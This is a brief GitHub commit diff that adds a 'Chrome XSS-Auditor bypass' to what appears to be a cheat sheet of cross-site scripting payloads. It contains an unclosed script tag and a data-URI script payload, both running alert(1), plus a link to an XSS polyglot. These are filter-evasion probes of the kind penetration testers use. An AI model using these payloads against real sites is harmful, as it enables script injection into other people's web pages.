Add another Chrome XSS-Auditor bypass.

This commit is contained in:
EdOverflow 2017-08-04 21:33:15 -06:00 committed by GitHub
parent 8c6e54dd65
commit a4a9136630

View file

@ -12,6 +12,12 @@
<script src="data:,alert(1)%250A--> <script src="data:,alert(1)%250A-->
``` ```
**Chrome XSS-Auditor Bypass**
```html
<script>alert(1)</script
```
**XSS Polyglot** by [Ahmed Elsobky](https://github.com/0xSobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot) **XSS Polyglot** by [Ahmed Elsobky](https://github.com/0xSobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
``` ```